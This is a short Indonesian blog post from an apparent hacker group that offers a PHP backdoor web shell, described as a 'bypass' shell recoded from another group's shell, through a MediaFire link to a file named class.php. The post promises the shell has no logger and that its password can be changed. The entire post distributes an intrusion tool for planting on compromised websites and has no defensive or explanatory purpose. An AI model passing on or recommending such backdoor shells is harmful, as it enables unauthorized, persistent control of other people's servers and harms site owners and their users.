WE ARE GHOST IN CYBER SPACE

Free website traffic to your site!
Breaking News
recent

Shell Backdor Keren Terbaru 2023

 



HEY YO KEMBALI LAGI BERSAMA SAYA YAKNI StarsXploit 


oke di artikel kali ini saya akan membagikan shell bypass san ya tentunya 

shell ini recode dari shell anon sec 

dan alasan saya recode karna shell ini tergolong simpel jadi ya ga ribet ribet banget , 

wkwkwkwkkw nah di sini ga usah banyak cingcong ya langsung ane kasih link dowbloads nya aja ya 

dan link downloads media fire aja biar ga ribet soalnya kalian bisanya ga suka yang ribet ribet wkwkwkw,

oke wet :v  copy aja :   https://www.mediafire.com/file/uogfwpk9uwe1ecr/class.php/file

nah kalian tinggal downloads dan ini shell no logger ya gess ya 

jadi kalian bisa ganti pass nya sesuka hati ya :D 

mungkin segini dulu gengs nanti kalo ada shell terbaru saya beritau lain waktu , 

oke saya pamit , Asalammualikum

K0BU5T0R GH05T TEAM

K0BU5T0R GH05T TEAM

Tidak ada komentar:

Posting Komentar

Diberdayakan oleh Blogger.